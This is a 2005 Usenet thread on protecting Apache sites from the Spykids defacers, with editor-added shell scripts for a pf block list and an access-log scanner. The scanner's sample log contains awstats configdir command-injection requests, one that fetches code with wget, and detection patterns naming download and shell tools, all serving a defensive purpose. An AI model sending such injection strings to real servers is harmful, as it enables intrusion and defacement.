comp.info.servers.unix: Web servers for UNIX platforms.

#1 The Doctor <doctor@doctor.nl2k.ab.ca>

SPykids is a known defacer of web sites. How does one prevent them from ever having access to the server or even a LAN?

Customer complained:

  Spykids should not be able to get into our websites regardless of whether they are piggy-backing on a member or not. This has happened 2x so far.

----------------------------

I am running Apache, most current version. Pointers?

-- 
Member - Liberal International
This is doctor@nl2k.ab.ca Ici doctor@nl2k.ab.ca
God Queen and country! Beware Anti-Christ rising!
Better to serve in Heaven than to Rule in Hell.

#2 Big Kahuna <chris@okennon.com>

Find out how they're getting in, and lock that down.

#3 Leythos <void@nowhere.lan>

In article <dc8ti0$nld$2@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca says...
> SPykids is a known defacer of web sites. How does one prevent them
> from ever having access to the server or even a LAN?
>
> Customer complained:
>
> Spykids should not be able to get into our websites
> regardless of whether they are
> piggy-backing on a member or not. This has happened 2x so far.

You need to learn how they are getting in, what measures you can take to block it and such.

First, put the web server behind a dedicated firewall, not a NAT box, a firewall - only allow real HTTP or HTTPS sessions to it.

Require users to have strong passwords; look it up if you don't know what that means.

Block IP networks that don't need access to your web sites - as an example I block about 50 subnets in countries outside of our own and it cuts down on a lot of attempts.

-- 
spam999free@rrohio.com
remove 999 in order to email me

#4 The Doctor

In article <1122512684.976893.18840@g49g2000cwa.googlegroups.com>, Big Kahuna <chris@okennon.com> wrote:
> Find out how they're getting in, and lock that down.

Which logs should I be looking at? I did not find anything in the web logs.

Where next?

#5 The Doctor

In article <MPG.1d52008b4f03a9a6989a7a@news-server.columbus.rr.com>, Leythos <void@nowhere.lan> wrote:
> First, put the web server behind a dedicated firewall, not a NAT box, a
> firewall - only allow real HTTP or HTTPS sessions to it.
>
> Require users to have strong passwords, look it up if you don't know
> what that means.
>
> Block IP networks that don't need access to your web sites - as an
> example I block about 50 subnets in countries outside of our own and it
> cuts down on a lot of attempts.

I am using pf via OpenBSD. What do I need to add?

#6 Thomas

The Doctor wrote:
> I am using pf via OpenBSD. What do I need to add?

Only install services that Apache needs and keep both your OpenBSD and Apache fully patched at all times. If you do that, you won't even need a firewall. But if the firewall is based on another computer, it doesn't hurt much (iow, even a firewall can have its buffer overflows and other stuff).

Then there are 0-day exploits. Not much you can do about them, I am afraid.

Also, change your passwords after a fresh install. And make them unguessable (like not using the pw 'God' for your 'root' account).

Thomas

-- 
Life is like a videogame with no chance to win - ATR

#7

The Doctor <doctor@doctor.nl2k.ab.ca> wrote:
> Big Kahuna <chris@okennon.com> wrote:
>> Find out how they're getting in, and lock that down.
>
> Which logs should I be looking at? I did not find anything in the web logs.
>
> Where next?

http://www.google.com/search?q=securing+howto

-- 
I thank GMX for sabotaging the use of my addresses by means of lies spread via SPF.

#8 Leythos

In article <dc9d6p$53n$3@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca says...
> I am using pf via OpenBSD. What do I need to add?

I don't use that combination, so I can't specifically state what you need to use, but I have to ask:

1) Is the firewall and web server the same machine? If so, bad idea; the firewall should be a stripped-down machine with minimal services and only the firewall application.

2) Did you secure Apache and the OS on the machine you use?

3) Does your site require user authentication?

I'm in the US and don't do business with foreign companies or need to provide access to our services from foreign hosts, so I block many subnets that seem to target our public IP addresses. Here is my short list; it may not work for you.

12.144.182.0/24
12.45.203.0/24
12.98.139.0/24
155.48.106.0/24
168.126.0.0/16
172.184.111.203
193.251.0.0/16
193.252.0.0/16
193.253.0.0/16
195.174.0.0/16
195.175.16.0/20
195.58.124.0/24
200.30.203.0/24
202.88.186.0/24
203.152.22.0/24
205.251.79.0/24
210.173.37.0/24
210.201.153.0/24
210.71.115.0/24
211.54.40.0/25
212.150.124.0/24
212.18.57.0/24
212.202.178.0/24
212.27.32.0-212.27.63.255
212.64.192.0-212.64.203.255
212.64.223.160/29
212.64.223.168/29
212.9.7.0/24
213.13.26.0/24
213.144.176.0/24
213.190.213.0/24
213.228.7.0/24
213.228.8.0/24
216.184.97.0/24
216.76.35.0/24
217.118.224.0/24
217.118.225.0/24
217.118.239.0/24
217.160.110.0/24
218.164.28.0/24
218.252.74.0/24
218.67.128.0-218.69.255.255
218.69.108.0/24
218.69.148.0/24
218.76.98.0/24
219.212.4.0/24

#9 The Doctor

Thomas wrote:
> Also, change your passwords after a fresh install. And make them
> unguessable (like not using the pw 'God' for your 'root' account).

I use the 3-4 combination on a 7+ string password.

#10 The Doctor

In article <MPG.1d52a8716b851357989a7c@news-server.columbus.rr.com>, Leythos <void@nowhere.lan> wrote:
> 1) Is the firewall and web server the same machine?
>    If so, bad idea, firewall should be a stripped down machine with
>    minimal services and only the firewall application.

Firewall, the OpenBSD machine running pf, is ISOLATED!

> 2) Did you secure Apache and the OS on the machine you use?

I am running BSD/OS 4.3.1 running current Apache. Still, my compile script looks like:

CC=/usr/bin/gcc CFLAGS="-Wall -DDEBUG -g -O9 -march=i686 " ./configure \
    --enable-layout=BSDI \
    --enable-v4-mapped \
    --enable-maintainer-mode \
    --enable-modules=most \
    --enable-mods-shared=all \
    --disable-optional-hook-export \
    --disable-optional-hook-import \
    --disable-optional-fn-export \
    --disable-optional-fn-import \
    --disable-ldap \
    --disable-auth-ldap \
    --disable-proxy \
    --disable-proxy-connect \
    --disable-proxy-ftp \
    --disable-proxy-http \
    --enable-auth-anon=shared \
    --enable-auth-dbmi=shared \
    --enable-auth-digest=shared \
    --enable-file-cache=shared \
    --enable-echo=shared \
    --enable-charset-lite=shared \
    --enable-cache=shared \
    --enable-disk-cache=shared \
    --enable-mem-cache=shared \
    --enable-ext-filter=shared \
    --enable-deflate=shared \
    --enable-logio=shared \
    --enable-mime-magic=shared \
    --enable-cern-meta=shared \
    --enable-expires=shared \
    --enable-headers=shared \
    --enable-usertrack=shared \
    --enable-unique-id=shared \
    --enable-ssl=shared \
    --enable-bucketeer=shared \
    --enable-static-support \
    --enable-static-htpasswd \
    --enable-static-htdigest \
    --enable-static-rotatelogs \
    --enable-static-logresolve \
    --enable-static-htdbm \
    --enable-static-ab \
    --enable-static-checkgid \
    --enable-http \
    --enable-dav=shared \
    --enable-info=shared \
    --enable-suexec=shared \
    --enable-cgi=shared \
    --enable-cgid=shared \
    --enable-dav-fs=shared \
    --enable-vhost-alias=shared \
    --enable-speling=shared \
    --enable-rewrite=shared \
    --enable-so \
    --with-z=/usr \
    --with-ssl=/usr/contrib \
    --with-mpm=prefork \
    --enable-nonportable-atomics=yes \
    --with-suexec-bin=/usr/contrib/bin \
    --with-suexec-caller=www \
    --with-suexec-userdir=html \
    --with-suexec-docroot=html \
    --with-suexec-uidmin=100 \
    --with-suexec-gidmin=100 \
    --with-suexec-logfile=/var/log/httpd/suexec_log \
    --with-suexec-safepath=/bin:/usr/bin:/usr/contrib/bin \
    --with-suexec-umask=022

> 3) Does your site require user authentication?

In the one that got nailed, .htaccess

> I'm in the US and don't do business with foreign companies or need to
> provide access to our services from foreign hosts, so I block many
> subnets that seem to target our public IP addresses, here is my short
> list, it may not work for you.
> [list snipped]
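
What the pf side of Leythos's advice looks like in practice, as an added example (editor's code, not anything posted in the thread): a small sh script that turns a block list in the formats of post #8 (CIDR prefixes, bare addresses, and a.b.c.d-e.f.g.h ranges, which pf tables do not accept as written) into a pf table file, and prints a pf.conf that drops those sources and passes only TCP 80/443 to the web server. The interface name fxp0, the server address 192.0.2.10 and the file paths are assumptions, and the sample list is constructed from entries in Leythos's post.

```shell
#!/bin/sh
# Added example (editor's code, not posted in the thread): build a pf table
# from a block list in the formats of post #8 and emit a pf.conf that passes
# only HTTP/HTTPS to the web server.
# Assumptions, not from the page: external interface fxp0, web server
# 192.0.2.10, table file /etc/pf.blocked. Adjust before use.

# ip2int: dotted quad -> 32-bit integer
ip2int() {
    IFS=. read -r a b c d <<EOF
$1
EOF
    echo $(( (a << 24) | (b << 16) | (c << 8) | d ))
}

# int2ip: 32-bit integer -> dotted quad
int2ip() {
    echo "$(( ($1 >> 24) & 255 )).$(( ($1 >> 16) & 255 )).$(( ($1 >> 8) & 255 )).$(( $1 & 255 ))"
}

# range2cidr START END: the minimal set of CIDR blocks covering START..END.
# pf tables accept addresses and CIDR prefixes, not a.b.c.d-e.f.g.h ranges,
# so the three ranges in the thread's list have to be split this way.
range2cidr() {
    s=$(ip2int "$1"); e=$(ip2int "$2")
    while [ "$s" -le "$e" ]; do
        bits=0
        # widen the block while it stays aligned at s and inside the range
        while [ "$bits" -lt 32 ]; do
            size=$(( 1 << (bits + 1) ))
            if [ $(( s % size )) -ne 0 ] || [ $(( s + size - 1 )) -gt "$e" ]; then
                break
            fi
            bits=$(( bits + 1 ))
        done
        echo "$(int2ip "$s")/$(( 32 - bits ))"
        s=$(( s + (1 << bits) ))
    done
}

# normalize_blocklist: stdin lines of CIDR, bare address or range -> one
# table entry per line, ready for "pfctl -t blocked -T replace -f FILE"
normalize_blocklist() {
    while read -r entry; do
        [ -z "$entry" ] && continue
        case $entry in
            *-*) range2cidr "${entry%-*}" "${entry#*-}" ;;
            *)   echo "$entry" ;;
        esac
    done
}

# pf_ruleset: drop table sources outright, then admit only TCP 80/443 to the
# web server. "flags S/SA" means only a SYN can create state, so stray
# packets that are not part of a real client session never reach Apache.
pf_ruleset() {
    cat <<'EOF'
ext_if = "fxp0"
web_srv = "192.0.2.10"
table <blocked> persist file "/etc/pf.blocked"

set skip on lo
block in log on $ext_if all
block in quick on $ext_if from <blocked> to any
pass in on $ext_if proto tcp from any to $web_srv port { 80, 443 } flags S/SA keep state
pass out on $ext_if keep state
EOF
}

# Constructed sample covering the three entry formats in Leythos's list
SAMPLE_LIST='12.144.182.0/24
172.184.111.203
212.27.32.0-212.27.63.255
218.67.128.0-218.69.255.255'

if [ "${1:-}" = "write" ]; then
    # as root on the firewall: write both files, parse-check, then load
    printf '%s\n' "$SAMPLE_LIST" | normalize_blocklist > /etc/pf.blocked
    pf_ruleset > /etc/pf.conf
    pfctl -nf /etc/pf.conf && pfctl -f /etc/pf.conf
else
    printf '%s\n' "$SAMPLE_LIST" | normalize_blocklist
fi
```

Run it with no arguments to see the normalized table (the two multi-/16 ranges become 212.27.32.0/19 and 218.67.128.0/17 plus 218.68.0.0/15), or `sh blocklist.sh write` as root on the firewall to write both files and load them; `pfctl -nf` parses the ruleset without loading it, so a typo does not leave the box wide open or cut off by accident. Rule order matters: pf applies the last matching rule unless a rule is marked quick, so the table block carries quick and sits before the pass rule. Treat the country list as a noise reducer rather than a control: someone who is "piggy-backing on a member" arrives from wherever that member is, and a hole in a CGI or PHP application is reached over the same port 80 the ruleset has to let through.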
#11 Leythos

In article <dcaunf$fn7$13@gallifrey.nk.ca>, doctor@doctor.nl2k.ab.ca says...
>> Also, change your passwords after a fresh install. And make them
>> unguessable (like not using the pw 'God' for your 'root' account).
>
> I use the 3-4 combination on a 7+ string password.

But if you use any word found in a dictionary, or a name or place, or anything other than a mix of letters, numbers, upper case/lower case, you are fooling yourself if you think your password is safe.

Use 10+ characters and a mix like Q74btl771Ne or, if your system permits, use special characters like !@#$%^&*() in the password.

#12 The Doctor

In article <MPG.1d52c9b8de84e4ab989a80@news-server.columbus.rr.com>, Leythos <void@nowhere.lan> wrote:
> But, if you use any word found in a dictionary or a name or place or
> anything other than a mix of letters, numbers, upper case/lower case,
> you are fooling yourself if you think your password is safe.
>
> Use 10+ characters and a mix like Q74btl771Ne or, if your system
> permits, use special characters like !@#$%^&*() in the password.

Dictionary attack. I know about those. I tell people the 3 or 4 combo. 3 combo is caps, smalls and numbers. Guess which is 4.

#13 Cristiano Deana - FreeCRIS <freecris@despammed.com>

On Wed, 27 Jul 2005 22:15:44 +0000, The Doctor wrote:
> I am running Apache most current version.

php?
do your customers have their own ftp access?
cgi?
do you/your_customers use phpBB or equivalent?

-- 
* Cristiano Deana, FreeCRIS - Biella
* Honda Hornet 600 grigionera, Andúril
* No, I don't add smileys. Add them yourself at random.

#14 The Doctor

In article <42ef7e0d$1_1@newsgate.x-privat.org>, Cristiano Deana - FreeCRIS <freecris@despammed.com> wrote:
> php?

5.0.4

> do your customers have their own ftp access?

Yes.

> cgi?

Yes.

> do you/your_customers use phpBB or equivalent?

Only one and it is the most current version.

#15 neale <neale@ranns.org>

spykids exploited a vulnerability in old versions of awstats (v5.0-6.3 i think). update awstats or don't use it, plus all the good advice above.

a story from someone with "first hand" experience:
http://www.bazon.net/mishoo/home.epl?NEWS_ID=1106
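
Neale's awstats pointer, together with the Doctor's earlier question about which logs to read (post #4), invites a concrete check. The sh script below is an added example (editor's code, not from the thread) that scans an Apache access log for the request shapes that hit old awstats installs and .htaccess-protected directories. It assumes the common/combined log format, and that the awstats issue neale refers to is the command injection through the `configdir` parameter of awstats.pl fixed in 6.3, which is the editor's reading and not something the post states; the log lines are constructed for the example, with documentation-range addresses.

```shell
#!/bin/sh
# Added example (editor's code, not from the thread): find the request
# shapes behind a web-application break-in in an Apache access log.
# Assumptions: common/combined log format; the awstats problem is the
# configdir command injection in awstats.pl before 6.3 (editor's reading).
# The log lines below are constructed for this example.

SAMPLE_LOG='203.0.113.7 - - [27/Jul/2005:22:15:44 +0000] "GET /index.html HTTP/1.1" 200 1234 "-" "Mozilla/4.0"
203.0.113.7 - - [27/Jul/2005:22:16:01 +0000] "GET /cgi-bin/awstats/awstats.pl?configdir=|echo;cd%20/tmp;wget%20http://198.51.100.9/x;echo| HTTP/1.1" 200 4321 "-" "Mozilla/4.0"
198.51.100.9 - - [27/Jul/2005:22:17:30 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cid%7C HTTP/1.0" 200 512 "-" "Lynx/2.8"
192.0.2.55 - - [27/Jul/2005:22:18:02 +0000] "GET /members/.htpasswd HTTP/1.1" 403 210 "-" "Mozilla/5.0"
192.0.2.56 - - [27/Jul/2005:22:19:10 +0000] "POST /forum/login.php HTTP/1.1" 302 0 "http://example.net/forum/" "Mozilla/5.0"
203.0.113.7 - - [27/Jul/2005:22:20:00 +0000] "GET /cgi-bin/awstats.pl?configdir=%7Cuname%20-a%7C HTTP/1.1" 200 700 "-" "Mozilla/4.0"
203.0.113.8 - - [27/Jul/2005:22:21:00 +0000] "GET /cgi-bin/awstats.pl?config=example.net HTTP/1.1" 200 9000 "-" "Mozilla/4.0"'

# flag_requests: read an access log on stdin and print the lines whose
# request looks like one of:
#   1. awstats.pl called with a configdir value that contains a pipe
#      (| or %7C), which is how the old awstats hole was driven;
#   2. a fetch of .htpasswd/.htaccess, i.e. going after the password file
#      of a .htaccess-protected site, the case the Doctor describes;
#   3. any query string carrying a pipe followed by a download or shell
#      command, whatever the script name.
# A plain "config=example.net" awstats request is legitimate and stays out.
flag_requests() {
    grep -Ei \
        -e 'awstats\.pl\?[^" ]*configdir=[^" ]*([|]|%7c)' \
        -e '"[A-Z]+ [^" ]*/\.ht(passwd|access)' \
        -e '"[A-Z]+ [^" ]*\?[^" ]*([|]|%7c)[^" ]*(wget|curl|fetch|/bin/sh|chmod|uname)'
}

# flagged_sources: count flagged requests per client address, busiest
# first, so you know which sources to pull every line for (and what to
# feed the firewall's block table).
flagged_sources() {
    flag_requests | awk '{ print $1 }' | sort | uniq -c | sort -rn
}

# top_source: the single busiest flagged address
top_source() {
    flagged_sources | head -n 1 | awk '{ print $2 }'
}

# Stand-alone run: show what the constructed sample yields
printf '%s\n' "$SAMPLE_LOG" | flag_requests
printf '%s\n' "$SAMPLE_LOG" | flagged_sources
```

Feed a real log with `flag_requests < /var/log/httpd/access_log`, then pull every line from the addresses `flagged_sources` reports. If the access log really is clean, the web server may not be where the door is: check error_log (stderr of CGI scripts lands there), the suexec_log that the compile options in post #10 enable, ftpd's syslog output (the customers have FTP accounts), and `last`/wtmp on the box, and compare the owner and mtime of the defaced files with the log timestamps. Files written by a command injected through awstats belong to the web-server user; files uploaded through FTP belong to the customer account. Which of the two you find narrows the entry point quickly.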
#16 The Doctor

In article <1123060630.002052.19810@g49g2000cwa.googlegroups.com>, neale <neale@ranns.org> wrote:
> spykids exploited a vulnerability in old versions of awstats (v5.0-6.3 i
> think).
> update awstats or don't use it, plus all the good advice above

awstats is a flop of a programme. Still, I will look around. I prefer wwwstats, and analog.

> a story from someone with "first hand" experience.
> http://www.bazon.net/mishoo/home.epl?NEWS_ID=1106